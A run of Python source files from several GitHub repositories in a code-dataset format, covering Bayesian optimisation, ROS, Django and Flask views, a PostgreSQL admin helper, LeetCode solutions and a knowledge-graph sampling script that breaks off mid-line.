ScaleKernel(ExponentialDecayKernel(active_dims = torch.tensor([X.shape[-1]-2]))) + \\\n ScaleKernel(IndexKernel(active_dims = torch.tensor([X.shape[-1]-1]), num_tasks=num_outputs))\n else:\n print('kernel name is not recognized')\n \n model = SingleTaskGP(X, y, covar_module = covar_module) # TODO: check how the two ways of defining kernels differ\n\n # TODO: Later, explore kernels that deal with integers better\n\n mll = ExactMarginalLogLikelihood(model.likelihood, model)\n fit_gpytorch_model(mll)\n\n # TODO: saving (design, fidelity) is likely required for freeze-thaw\n # load state dict if it is passed\n # if state_dict is not None:\n # model.load_state_dict(state_dict)\n \n return model\n\ndef optimize_acqf_and_suggest_new_pt(\n algo, X, y, objective, bounds, param_ranges, trial, is_multitask, kernel_name, \n is_int=None, cost_aware_utility = None, project = None, \n fidelity_dim = None, num_outputs = None, num_fidelities = None, **kwargs):\n\n \"\"\" General steps for a non-random-sampling algorithm:\n 1. define and fit GP model\n 2. define sampler for evaluating the acqf\n 3. construct acqf\n 4. optimize acqf (w fixed feature if including fidelity)\n \"\"\"\n \n print('suggesting new point')\n\n if algo == 'random':\n return generate_initial_samples(1, param_ranges, seed = trial)\n\n elif algo == 'EI':\n model = fit_GP_model(X, y, is_multitask, kernel_name, is_int)\n # sampler = SobolQMCNormalSampler(num_samples=64)\n sampler = IIDNormalSampler(num_samples=64)\n if not is_multitask:\n best = y.max().item()\n else:\n best = objective(y).max().item() # TODO; change this, though not super urgent as I'm primarily using KG now\n \n # define acq function\n acqf = qExpectedImprovement(\n model = model, \n best_f = best, \n sampler = sampler, \n objective = objective\n )\n print('use EI, fit GP, best value is {}'.format(best))\n\n candidates, acqf_val = optimize_acqf(\n acq_function = acqf,\n bounds = bounds,\n q = 1, # TODO: figure out the following three\n num_restarts = 10,\n raw_samples = 512\n )\n\n elif algo == 'KG':\n\n # fit a multi output GP model\n model = fit_GP_model(X, y, is_multitask, kernel_name, is_int, num_outputs)\n\n # TODO: instead of printing, save these in a dictionary\n # if is_multitask:\n # print('task-fidelity covariance matrix', get_task_fidelity_covariance(model, X, num_outputs, num_fidelities))\n # print('task covariance matrix', get_task_covariance(model, X, num_outputs))\n # print('fidelity covariance matrix', get_fidelity_covariance(model))\n\n acqf = get_mfkg(model, objective, bounds, cost_aware_utility, project, fidelity_dim, is_multitask)\n\n current_max_posterior_mean = acqf.current_value\n\n # TODO: does fixing the task to be 0 affect the acqf optimization?\n # I think so, because it enforces evaluating the main task\n # But then the algorithm doesn't know that other tasks will be observed as well, \n # so the between-task correlation learned so far won't enter the decision process.\n\n # Sidenote: setting fixed_features here or not shouldn't matter b/c there's the project() operator already\n if is_multitask:\n fixed_features = {fidelity_dim + 1: 0} # fixed task to be 0\n else:\n fixed_features = None\n \n # generate KG initial conditions with fidelity fixed to 1 and task fixed to 0 (if multi-task)\n # note that bounds is still the full set of bounds, including those that were fixed during get_mfkg()\n\n X_init = gen_one_shot_kg_initial_conditions(\n acq_function = acqf,\n bounds=bounds,\n fixed_features = fixed_features,\n q=1,\n num_restarts=10, # default value is 20\n raw_samples=512, # default value is 1024\n options = {\n 'num_inner_restarts': 10, \n 'raw_inner_samples': 512, # default is 20 and 1024\n 'batch_limit': 5 # if this is not specified, raw_inner_samples posterior computations happen at the same time, leading to OOM\n } \n )\n \n candidates, acqf_val = optimize_acqf(\n acq_function = acqf,\n bounds = bounds, \n q = 1,\n num_restarts = 10, \n raw_samples = 512,\n fixed_features = fixed_features,\n batch_initial_conditions = X_init,\n options={\"batch_limit\": 5, \"maxiter\": 200}, # TODO: see if decreasing maxiter helps\n )\n \n if len(acqf_val.size()) == 0:\n acqf_val = acqf_val.unsqueeze(0)\n \n for i in range(candidates.shape[-1]):\n if is_int[i]:\n candidates[..., i] = torch.round(candidates[..., i])\n\n print('optimize MultiFidelityKG, get candidates ', candidates, ', acqf_val ', acqf_val)\n\n # delete model to free memory\n del model, acqf\n\n # candidates has shape q x (design_dim + 2) -- both fidelity and task are included\n return candidates, acqf_val, current_max_posterior_mean\n\n\ndef generate_initial_samples(n_samples, param_ranges, seed=None):\n\n if seed is not None:\n torch.manual_seed(seed)\n\n initial_X = torch.Tensor()\n\n for k, ranges in param_ranges.items():\n\n #if k == 'iteration_fidelity':\n # initial_X = torch.cat((initial_X, torch.ones(n_samples, 1)), dim = 1)\n # continue\n\n if ranges[0] == 'uniform':\n sample = torch.FloatTensor(n_samples, 1).uniform_(ranges[1][0], ranges[1][1])\n initial_X = torch.cat((initial_X, sample), dim = 1)\n \n elif ranges[0] == 'int':\n sample = torch.randint(ranges[1][0], ranges[1][1]+1, (n_samples, 1))\n initial_X = torch.cat((initial_X, sample), dim = 1)\n\n elif ranges[0] == 'discrete':\n vals = ranges[1]\n sample = torch.Tensor(random.choices(vals, k = n_samples))\n initial_X = torch.cat((initial_X, torch.unsqueeze(sample, 1)), dim = 1)\n \n return initial_X\n\ndef get_param_bounds(param_ranges):\n \n num_params = len(param_ranges)\n bounds = torch.empty(2, num_params)\n \n # also return the is_int feature to be passed into Matern kernel\n is_int = []\n\n for i, ranges in enumerate(param_ranges.values()):\n bounds[0,i] = min(ranges[1])\n bounds[1,i] = max(ranges[1])\n\n if ranges[0] in ['discrete', 'int']:\n is_int.append(True)\n else:\n is_int.append(False)\n \n return bounds.float(), is_int\n \n\ndef get_mfkg(model, objective, bounds, cost_aware_utility, project, fidelity_dim, is_multitask):\n\n if is_multitask:\n curr_val_acqf = FixedFeatureAcquisitionFunction(\n acq_function=PosteriorMean(model),\n d=fidelity_dim + 2, \n columns=[fidelity_dim, -1],\n values=[1, 0], # fix to fidelity = 1, task = 0 \n )\n _bounds = bounds[:,:-2]\n else:\n curr_val_acqf = FixedFeatureAcquisitionFunction(\n acq_function=PosteriorMean(model),\n d=fidelity_dim + 1, \n columns=[fidelity_dim],\n values=[1], # fix to fidelity = 1\n )\n _bounds = bounds[:,:-1]\n \n # get the largest mean (of the main task at highest fidelity) under the current posterior,\n # optimizing with respect to the designs only\n _, current_value = optimize_acqf(\n acq_function=curr_val_acqf,\n bounds = _bounds,\n q=1,\n num_restarts=10, \n raw_samples=128, \n options={\"batch_limit\": 10, \"maxiter\": 200},\n )\n\n print('current max posterior mean before sampling new points: {}'.format(current_value))\n \n # return the KG, the expected increase in best expected value conditioned on q more samples\n return qMultiFidelityKnowledgeGradient(\n model=model,\n num_fantasies=64, # sized down from 128, see how it affects memory\n current_value=current_value,\n cost_aware_utility=cost_aware_utility,\n project=project,\n )\n\n\n# TODO: Next is to understand how to correctly inspect the task-fidelity covariance!\n","repo_name":"zyyjjj/SGD_diagnostics","sub_path":"src/BO_trial.py","file_name":"BO_trial.py","file_ext":"py","file_size_in_byte":21655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23330866340","text":"#!/usr/bin/env python\n\nimport rospy\nimport argparse\nimport importlib\nimport numpy as np\nimport roslaunch\nfrom std_msgs.msg import (Header, String, Float64, Empty)\nfrom operator import itemgetter\nfrom roslib import message\n\nclass flag_listen(object):\n def __init__(self):\n print(\"init checkpoint\")\n rospy.init_node('flag_listener', anonymous=True)\n # subscriber to flag\n self.flagSubscriber = rospy.Subscriber(\"/flag_topic\", String, self.flag_callback)\n self.flag = False\n# rospy.spin()\n\n def flag_callback(self, msg):\n# rospy.loginfo(\"flag received\")\n print(msg)\n if msg.data == str(\"True\"):\n rospy.loginfo(\"flag received\")\n print(\"hello world\")\n self.flag = True\n if self.flag == True:\n print(\"hello again\")\n # insert TCST17_LR.py call here\n else:\n print(\"goodbye again\")\n# rospy.spin()\n else:\n rospy.logerr(\"flag not received\")\n print(\"goodbye world\")\n# rospy.spin()\n\n# def flag_result(self):\n# if self.flag == True:\n# print(\"hello again\")\n# else:\n# print(\"goodbye again\")\n# rospy.spin()\n\n#def callback(msg):\n# print(msg)\n# if msg.data == str(\"True\"):\n# print(\"hello world\")\n# else:\n# print(\"goodbye world\")\n\ndef main():\n# placeholder\n print(\"placeholder\")\n FC = flag_listen()\n# FC.flag_result()\n rospy.spin()\n\n# rospy.init_node('flag_listener', anonymous=True)\n# rospy.Subscriber(\"/flag_topic\", String, callback)\n\nif __name__ == '__main__':\n#\tinitialise()\n main()\n\n# taken from http://wiki.ros.org/roslaunch/API%20Usage\n# package = 'polish_sr300'\n# exectuable = 'TCST17_LR.py'\n# node = roslaunch.core.Node(package, executable)\n\n# launch = roslaunch.scriptapi.ROSLaunch()\n# launch.start()\n\n# process = launch.launch(node)\n# print process.is_alive()\n# process.stop()\n","repo_name":"sento86/sawyer_ws","sub_path":"src/polish_sr300/scripts/flag_listener_test.py","file_name":"flag_listener_test.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"29850689102","text":"from OpenGL import GL\nfrom PyQt6.QtWidgets import QApplication\n\nfrom scenes.plate_scene import PlateScene\n\nif __name__ == '__main__':\n app = QApplication([])\n screens = app.screens()\n\n widget = PlateScene(\n screens[-1]\n )\n widget.show()\n app.exec()\n","repo_name":"Infoboros/image-recognition-systems","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41569238496","text":"from django.core.paginator import Paginator\nfrom django.http import JsonResponse\nfrom .models import Films\nfrom django.views.generic import View, TemplateView\nfrom django.core.serializers import serialize\nimport json\n# Create your views here.\n\n\nclass IndexView(TemplateView):\n template_name = 'index.html'\n\n def get_context_data(self, *args, **kwargs):\n # context = super(IndexView, self).get_context_data(*args, **kwargs)\n films_limit = 20\n films = Films.objects.all()\n paginator = Paginator(films, films_limit)\n page_number = self.request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n return {'page_obj': page_obj}\n\n def load_more_films(request):\n films_limit = 20\n films = Films.objects.all()\n paginator = Paginator(films, films_limit)\n page = int(request.GET.get(\"page\"))\n page_obj = list(paginator.get_page(page))\n serialized_data = serialize(\"json\", page_obj)\n serialized_data = json.loads(\n serialized_data) if page <= paginator.num_pages else \"\"\n return JsonResponse(data={\"page_obj\": serialized_data})\n\n\nclass FilmView(TemplateView):\n template_name = 'film.html'\n\n def get_context_data(self, film, *args, **kwargs):\n # context = super(IndexView, self).get_context_data(*args, **kwargs)\n film_obj = Films.objects.get(pk=film)\n film_obj.film_genre = list(map(lambda elem: elem.strip(), film_obj.film_genre.split(\",\")))\n return {'film_obj': film_obj}\n\n\nclass GenreView(TemplateView):\n template_name = 'genres.html'\n\n def get_context_data(self, genre, *args, **kwargs):\n # context = super(IndexView, self).get_context_data(*args, **kwargs)\n films_limit = 20\n films = Films.objects.filter(film_genre__contains=genre).values()\n paginator = Paginator(films, films_limit)\n page_number = self.request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n # film_obj.film_genre = film_obj.film_genre.replace(\" \", \"\").split(\",\")\n return {'page_obj': page_obj, \"genre\": genre}\n\n def load_more_films(request, genre):\n films_limit = 20\n page = int(request.GET.get(\"page\"))\n films = Films.objects.filter(film_genre__contains=genre).values()\n paginator = Paginator(films, films_limit)\n page_obj = list(paginator.get_page(page))\n # serialized_data = serialize(\"json\", page_obj) # !!!\n # serialized_data = json.loads(\n # serialized_data) if page <= paginator.num_pages else \"\"\n return JsonResponse(data={\"page_obj\": page_obj if page <= paginator.num_pages else \"\"})\n","repo_name":"Taras-Romaniuk/ua_kino_clone","sub_path":"myfilms/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22605591141","text":"from flask import request, render_template, url_for, redirect, flash\nfrom app import models, db, app\n\n\ndef index():\n transactions = models.Transactions.query.all()\n return render_template('index-card.html', transactions=transactions)\n\n\ndef add_transaction():\n transactions = models.Transactions.query.all()\n if request.method == 'POST':\n period = request.args.get('period')\n value = request.args.get('value')\n status = request.args.get('status')\n unit = request.args.get('unit')\n subject = request.args.get('subject')\n new_transaction = models.Transactions(period=period, value=value, status=status, unit=unit, subject=subject)\n db.session.add(new_transaction)\n db.session.commit()\n return render_template('add_transaction.html', transactions=transactions)\n return redirect(url_for('index'))\n\n","repo_name":"Bravo604/flask_transaction","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25553376526","text":"\"\"\"Support for PostgreSQL database interactions.\"\"\"\nimport getpass\nimport os\nimport socket\nimport logging\nimport subprocess\nfrom collections import namedtuple\n\nimport pexpect\nimport psycopg2\n\nfrom pydba.exc import DatabaseError, CommandNotFoundError\n\nlog = logging.getLogger(__name__)\n\n\nCONNECTION_FIELDS = [\n 'datname', 'datid', 'pid', 'state', 'application_name', 'query',\n 'usename', 'waiting', 'client_hostname', 'client_addr', 'client_port'\n]\n\nConnection = namedtuple('Connection', CONNECTION_FIELDS)\n\n\nSETTINGS_FIELDS = [\n 'name', 'setting', 'unit', 'category', 'short_desc', 'extra_desc',\n 'context', 'vartype', 'source', 'min_val', 'max_val', 'enumvals',\n 'boot_val', 'reset_val', 'sourcefile', 'sourceline'\n]\n\nSettings = namedtuple('Settings', SETTINGS_FIELDS)\n\n\nclass PostgresDB(object):\n \"\"\"\n An API for performing various database administration tasks on a PostgresDB server.\n \"\"\"\n _vartype_map = {\n 'bool': lambda x: True if x == 'on' else False,\n 'enum': lambda x: x,\n 'integer': lambda x: int(x),\n 'real': lambda x: float(x),\n 'string': lambda x: x,\n }\n\n def __init__(self, host='localhost', port=5432, database='postgres', user=None, password=None,\n sslmode=None, sslcert=None, sslkey=None, application_name='pydba (psycopg2)'):\n \"\"\"\n Constructor.\n\n All arguments are optional and sensible defaults. Override using args depending on your needs.\n\n Parameters\n ----------\n host: str, optional\n remote server IP address or hostname\n port: int, optional\n remote server port\n database: str, optional\n name of database to connect to\n user: str\n name of user (with required admin privileges)\n password:\n password for user\n sslmode: str, optional\n mode for SSL connection\n sslcert: str, optional\n file path to SSL certificate for connection\n sslkey: str, optional\n file path to SSL key for connection\n application_name: str, optional\n allow user to specify the app name in the connection\n \"\"\"\n if user is None:\n user = getpass.getuser()\n\n self._connect_args = dict(\n application_name=application_name,\n database=database, user=user, password=password,\n host=host, port=port,\n sslmode=sslmode, sslcert=sslcert, sslkey=sslkey,\n )\n\n self._bin_paths = {}\n\n def _run_stmt(self, stmt):\n with psycopg2.connect(**self._connect_args) as conn:\n conn.set_session(autocommit=True)\n with conn.cursor() as cur:\n cur.execute(stmt)\n log.info('done')\n\n def _iter_results(self, stmt):\n with psycopg2.connect(**self._connect_args) as conn:\n with conn.cursor() as cur:\n cur.execute(stmt)\n header = [col.name for col in cur.description]\n for row in cur:\n yield dict(zip(header, row))\n\n def _path_for(self, cmd):\n if cmd in self._bin_paths:\n return self._bin_paths[cmd]\n else:\n path = pexpect.which(cmd)\n if path is None:\n raise CommandNotFoundError('failed to find path of %r' % cmd)\n self._bin_paths[cmd] = path\n return path\n\n def _run_cmd(self, cmd, *args):\n cmd_line = [self._path_for(cmd)] + list(args)\n log.info('running: %r' % cmd_line)\n proc = subprocess.Popen(cmd_line, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = proc.communicate()\n if proc.returncode:\n log.error(stderr)\n else:\n if stdout:\n log.error('unexpected output: ' + stdout)\n if stderr:\n log.info(stderr)\n log.info('done')\n\n def names(self):\n \"\"\"Returns a list of all database names.\"\"\"\n stmt = \"\"\"\n select datname\n from pg_database\n where datistemplate = false\n \"\"\"\n return [x['datname'] for x in self._iter_results(stmt)]\n\n def exists(self, name):\n \"\"\"Returns True if named database exists, False otherwise.\"\"\"\n return name in self.names()\n\n def create(self, name):\n \"\"\"Creates a new database.\"\"\"\n log.info('creating database %s' % name)\n self._run_stmt('create database %s' % name)\n\n def drop(self, name):\n \"\"\"Drops an existing database.\"\"\"\n log.info('dropping database %s' % name)\n self._run_stmt('drop database %s' % name)\n\n def rename(self, from_name, to_name):\n \"\"\"Renames an existing database.\"\"\"\n log.info('renaming database from %s to %s' % (from_name, to_name))\n self._run_stmt('alter database %s rename to %s' % (from_name, to_name))\n\n def connections(self, name):\n \"\"\"Returns a list of existing connections to the named database.\"\"\"\n stmt = \"\"\"\n select {fields} from pg_stat_activity\n where datname = {datname!r} and pid <> pg_backend_pid()\n \"\"\".format(fields=', '.join(CONNECTION_FIELDS), datname=name)\n return list(Connection(**x) for x in self._iter_results(stmt))\n\n def kill_connections(self, name):\n \"\"\"Drops all connections to the specified database.\"\"\"\n log.info('killing all connections to database %s' % name)\n self._run_stmt(\"\"\"\n select pg_terminate_backend(pid)\n from pg_stat_activity\n where datname = %r and pid <> pg_backend_pid()\n \"\"\" % name)\n\n def available(self, timeout=5):\n \"\"\"Returns True if database server is running, False otherwise.\"\"\"\n host = self._connect_args['host']\n port = self._connect_args['port']\n try:\n sock = socket.create_connection((host, port), timeout=timeout)\n sock.close()\n return True\n except socket.error:\n pass\n return False\n\n def dump(self, name, filename):\n \"\"\"\n Saves the state of a database to a file.\n\n Parameters\n ----------\n name: str\n the database to be backed up.\n filename: str\n path to a file where database backup will be written.\n \"\"\"\n if not self.exists(name):\n raise DatabaseError('database %s does not exist!')\n log.info('dumping %s to %s' % (name, filename))\n self._run_cmd('pg_dump', '--verbose', '--blobs', '--format=custom',\n '--file=%s' % filename, name)\n\n def restore(self, name, filename):\n \"\"\"\n Loads state of a backup file to a database.\n\n Note\n ----\n If database name does not exist, it will be created.\n\n Parameters\n ----------\n name: str\n the database to which backup will be restored.\n filename: str\n path to a file contain a postgres database backup.\n \"\"\"\n if not self.exists(name):\n self.create(name)\n else:\n log.warn('overwriting contents of database %s' % name)\n log.info('restoring %s from %s' % (name, filename))\n self._run_cmd('pg_restore', '--verbose', '--dbname=%s' % name, filename)\n\n def _connect_options(self, name):\n if name is None:\n db_name = self._connect_args['database']\n else:\n db_name = name\n\n options = [\n ('dbname', db_name),\n ('user', self._connect_args['user']),\n ('host', self._connect_args['host']),\n ('port', self._connect_args['port']),\n ]\n\n if self._connect_args['sslmode'] is not None:\n options = options + [\n ('sslmode', self._connect_args['sslmode']),\n ('sslcert', os.path.expanduser(self._connect_args['sslcert'])),\n ('sslkey', os.path.expanduser(self._connect_args['sslkey'])),\n ]\n\n return options\n\n def connection_dsn(self, name=None):\n \"\"\"\n Provides a connection string for database.\n\n Parameters\n ----------\n name: str, optional\n an override database name for the connection string.\n\n Returns\n -------\n str: the connection string (e.g. 'dbname=db1 user=user1 host=localhost port=5432')\n \"\"\"\n return ' '.join(\"%s=%s\" % (param, value) for param, value in self._connect_options(name))\n\n def connection_url(self, name=None):\n \"\"\"\n Provides a connection string for database as a sqlalchemy compatible URL.\n\n NB - this doesn't include special arguments related to SSL connectivity (which are outside the scope\n of the connection URL format).\n\n Parameters\n ----------\n name: str, optional\n an override database name for the connection string.\n\n Returns\n -------\n str: the connection URL (e.g. postgresql://user1@localhost:5432/db1)\n \"\"\"\n return 'postgresql://{user}@{host}:{port}/{dbname}'.format(**{k: v for k, v in self._connect_options(name)})\n\n def shell(self, expect=pexpect):\n \"\"\"\n Connects the database client shell to the database.\n\n Parameters\n ----------\n expect_module: str\n the database to which backup will be restored.\n \"\"\"\n dsn = self.connection_dsn()\n log.debug('connection string: %s' % dsn)\n child = expect.spawn('psql \"%s\"' % dsn)\n if self._connect_args['password'] is not None:\n child.expect('Password: ')\n child.sendline(self._connect_args['password'])\n child.interact()\n\n def settings(self):\n \"\"\"Returns settings from the server.\"\"\"\n stmt = \"select {fields} from pg_settings\".format(fields=', '.join(SETTINGS_FIELDS))\n settings = []\n for row in self._iter_results(stmt):\n row['setting'] = self._vartype_map[row['vartype']](row['setting'])\n settings.append(Settings(**row))\n return settings\n","repo_name":"drkjam/pydba","sub_path":"pydba/postgres.py","file_name":"postgres.py","file_ext":"py","file_size_in_byte":10078,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"32846695518","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def hasCycle(self, head): #哈希表\n seen = set()\n while head:\n if head in seen:\n return True\n seen.add(head)\n head = head.next\n return False\n\n def hasCycle1(self, head): #快慢指针\n if not head or not head.next:\n return False\n slow = head\n fast = head.next\n while slow != fast:\n if not fast or not fast.next:\n return False\n slow = slow.next\n fast = fast.next.next\n return True\n\nif __name__ == '__main__':\n list = ListNode(1, next=ListNode(2, next=ListNode(3, next=ListNode(4))))\n node = ListNode(1)\n list = ListNode(1, next=ListNode(2, next=ListNode(3, next=node)))\n node.next = list\n solution = Solution()\n res = solution.hasCycle(list)\n print(res)","repo_name":"chenximei/LeetCode","sub_path":"141 Linked List Cycle.py","file_name":"141 Linked List Cycle.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18296146670","text":"\"\"\"\nQuestion 3 Longest Substring Without Repeating Characters:\nGiven a string s, find the length of the longest \nsubstring without repeating characters.\n\nExample 1:\nInput: s = \"abcabcbb\"\nOutput: 3\nExplanation: The answer is \"abc\", with the length of 3.\n\nExample 2:\nInput: s = \"bbbbb\"\nOutput: 1\nExplanation: The answer is \"b\", with the length of 1.\nExample 3:\n\nInput: s = \"pwwkew\"\nOutput: 3\nExplanation: The answer is \"wke\", with the length of 3.\nNotice that the answer must be a substring, \"pwke\" is a subsequence and not a substring.\n\"\"\"\n# Sliding Window\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n # Create a new Set\n charSet = set()\n # Set left pointer to first position\n l = 0 \n # Create Result var\n res = 0\n\n # Use Right pointer to loop through string\n for r in range(len(s)):\n # If right pointer is in the set remove the character at left pointer then increment left pointer position\n while s[r] in charSet:\n charSet.remove(s[l])\n l += 1\n # Add the right pointer character to the set\n charSet.add(s[r])\n # compute window size for result\n res = max(res, r -l + 1)\n return res","repo_name":"whume/leetcode","sub_path":"medium/3-longest-substring-without-repeating-characters.py","file_name":"3-longest-substring-without-repeating-characters.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2650127505","text":"\"\"\" Create and save in output folder weighted KG \"\"\"\n\nimport os, argparse\nimport operator, math\nimport time\n\nimport pandas as pd\nimport owlready2.namespace\nimport joblib\nfrom typing import List\n\nimport hate_datasets as dc\nimport functions.kg.utils as kg_utils\nimport functions.kg.indexing as kg_index\nimport functions.kg.weighting as kg_weight\nfrom functions.helper import save_dict\n\n# Global variables: cant use - or _ as separators\nTHRS = [0.5] # int (standard thresholding), str (different aggregation functions?)\nMATCH_METHODS = kg_index.MATCH_METHODS\nINFER_METHODS = kg_utils.INFER_METHODS\nWEIGHT_BY_SCORE = kg_weight.WEIGHT_BY_SCORE\nWEIGHT_BY_MODEL = kg_weight.WEIGHT_BY_MODEL\nWEIGHT_FS = kg_weight.WEIGHT_FS\n\nDNAMES = dc.DNAMES\nPROJ_DIR = os.getcwd()\nOUTPUT_FOLDER = f'{PROJ_DIR}/models/adaptation'\nCHECKPOINTS_FOLDER = f'{PROJ_DIR}/models/adaptation/checkpoints'\nDATA_FOLDER = f'{PROJ_DIR}/data'\n\n\ndef collect_owl_from_path(kg_path: str,\n output_folder: str = OUTPUT_FOLDER) -> owlready2.namespace.Ontology:\n \"\"\" Load saved version of ontology from local repository or import from owl path and save a copy \"\"\"\n fname = kg_path.split('/')[-1]\n o_path = f'{output_folder}/{fname}'\n if os.path.exists(o_path):\n kg = kg_utils.load_owl(o_path)\n print('Found OWL file in output folder. Importing.')\n else:\n kg = kg_utils.load_owl(kg_path)\n if not os.path.exists(output_folder):\n os.mkdir(output_folder)\n kg.save(file=o_path)\n print(f'OWL collected from {kg_path} and saved in output folder.')\n return kg\n\n\ndef disproportionate_stratified_sampling(n: int, df: pd.DataFrame, col_to_sample: List) -> pd.DataFrame:\n \"\"\"\n Get sample of size n from df using stratified sample.\n Returning balanced samples of populations indicated by binary columns in col_to_sample list\n More info on disproportionate sampling: https://www.geeksforgeeks.org/stratified-sampling-in-pandas/\n \"\"\"\n # 1. Create sampling dict: needed for balanced sampling with no repetitions\n # dict of index lists which are unique in each group in ascending order\n\n # a. get group sample sizes in ascending order\n sample_sizes = {gi: df.loc[df[gi] == 1].shape[0] for gi in col_to_sample}\n sample_sizes = dict(sorted(sample_sizes.items(), key=operator.itemgetter(1)))\n #print(sample_sizes)\n\n # b. get sample id lists for each group that are unique according to sample size ascending order\n sampling_dict, ids_inc = {}, []\n for g in sample_sizes.keys():\n sampling_dict[g] = df.loc[(df[g] == 1) & (~df.index.isin(ids_inc))].index.to_list()\n ids_inc += sampling_dict[g]\n\n # 2. Create balanced sampled df\n # df subset of n size\n\n # a. get subgroup sample sizes as per how many samples can be extracted from each subgroup given final sample size N\n sampling_sizes = {}\n n_remaining, g_remaining = n, list(sample_sizes.keys())\n for g in sample_sizes.keys():\n sample_size = len(sampling_dict[g])\n subg_n = math.ceil(n_remaining/len(g_remaining))\n sampling_sizes[g] = sample_size if subg_n > sample_size else subg_n\n # update remaining sample sizes and groups to sample from\n n_remaining = n_remaining - sampling_sizes[g]\n g_remaining.remove(g)\n #print(sampling_sizes)\n\n # b. return the balanced sample of df by drawing randomly samples from each subgroup of its corresponding\n # sample size\n sampled_ids = []\n for g in sample_sizes.keys():\n # print(f'{g}: sampling_sizes: {sampling_sizes[g]} sample size: {sample_sizes[g]}')\n g_sample = pd.Series(sampling_dict[g]).sample(n=sampling_sizes[g], random_state=1)\n sampled_ids += g_sample.to_list()\n\n sampled_df = df.loc[df.index.isin(sampled_ids)].copy()\n return sampled_df\n\n\ndef adaptation_subset(d: pd.DataFrame,\n g_labels: dict,\n dname: str,\n thr: int,\n identities: List = None,\n data_folder: str = DATA_FOLDER):\n \"\"\"\n Add 'identities' to df_train: binary column with sample of related and not related texts for KG adaptation.\n Can be at group (e.g., gender) or subgroup (e.g., male) level.\n Rule to determine n (max possible sample for Npos=Nneg)\n \"\"\"\n if identities is None:\n identities = ['gender', 'sexual_orientation']\n y_col = ''.join([i for identity in identities for i in identity.split('_')])\n print(f\"Sampling distribution with thr={thr} for {y_col}\")\n # Create binary columns with groups over thr (g_labels keys) and\n # nones (i.e., texts with no identity group labels over thr (\"None\"))\n if identities[0] in g_labels.keys():\n # ... groups\n g_labels = list(g_labels.keys())\n else:\n # ... subgroups\n g_labels = [subg_i for subg_l in g_labels.values() for subg_i in subg_l]\n g_labels_bin = []\n for g in list(g_labels):\n d.loc[:, f'{g}_{thr}'] = d[f'{g}'].apply(lambda perc: 1 if perc >= thr else 0)\n g_labels_bin.append(f'{g}_{thr}')\n d.loc[:, f'none_{thr}'] = d.apply(lambda row: 1 if sum(row[g_labels_bin]) == 0 else 0, axis=1)\n g_labels_bin.append(f'none_{thr}')\n print(f' {d.loc[d[f\"none_{thr}\"] == 1,].shape[0]}/{d.shape[0]} samples with no identity annotations under {thr}')\n\n if len(identities) == 2:\n id_1, id_2 = identities\n # Take n (minimum samples of either positive group)\n d_1, d_2 = d.loc[d[f'{id_1}_{thr}'] == 1], d.loc[d[f'{id_2}_{thr}'] == 1]\n n_pos_min = min(d_1.shape[0], d_2.shape[0])\n print(f' min {id_1} or {id_2} sample: {n_pos_min}')\n\n # Get balanced positive sample: with all samples from min pos group and n sample from the other pos group\n col_pos = [f'{g}_{thr}' for g in identities]\n if (d_1.loc[~d_1.index.isin(d_2.index)].shape[0] >= n_pos_min) or (d_2.loc[~d_2.index.isin(d_1.index)].shape[0] >= n_pos_min):\n # ... there are enough disjoint examples from the majority class to draw a balanced sample\n pos_df = disproportionate_stratified_sampling(2*n_pos_min, d, col_pos)\n else:\n # ... need to take n sample from both and remove duplicates\n pos_samples = [d_1.sample(n=n_pos_min, random_state=1), d_2.sample(n=n_pos_min, random_state=1)]\n pos_df = pd.concat(pos_samples, join='inner')\n pos_df = pos_df[~pos_df.duplicated()]\n neg_df = d.loc[(d[f'{id_1}_{thr}'] == 0) & (d[f'{id_2}_{thr}'] == 0)].copy()\n elif len(identities) == 1:\n col_pos = [f'{identities[0]}_{thr}']\n pos_df = d.loc[d[col_pos[0]] == 1].copy()\n neg_df = d.loc[d[col_pos[0]] == 0].copy()\n else:\n raise Exception(f'Adaptation not supported for more than 2 identities, provided {identities}')\n n_pos = pos_df.shape[0]\n pos_df[y_col] = n_pos * [1]\n print(f' {n_pos} unique positive samples ')\n if len(identities) == 2:\n print(f'2*n ({n_pos_min}) = {2 * n_pos_min} - {2 * n_pos_min - n_pos} duplicates')\n for g in col_pos:\n print(f' -- {g}: {pos_df.loc[pos_df[g] == 1,].shape[0]}')\n\n # Get balanced negative sample of n_pos sample size: stratification with disproportionate sampling\n col_to_stratify = [x for x in g_labels_bin if x not in col_pos]\n neg_df = disproportionate_stratified_sampling(n_pos, neg_df, col_to_stratify)\n neg_df[y_col] = n_pos * [0]\n print(f' {neg_df.shape[0]} unique negative samples:')\n for g in col_to_stratify:\n print(f' -- {g}: {neg_df.loc[neg_df[g] == 1,].shape[0]}')\n\n # Take df_eval as d.notin(df_train)\n df_train = pd.concat([pos_df, neg_df])\n # ... ensure that values in either pos_label are unique\n df_train = df_train[~df_train.duplicated(subset=df_train.columns.to_list()[:-1])]\n print(f' {df_train.shape[0]} unique train samples: '\n f'2*n ({n_pos}) = {2 * n_pos} - {2 * n_pos - df_train.shape[0]} duplicates:')\n print(f' -- {y_col}: 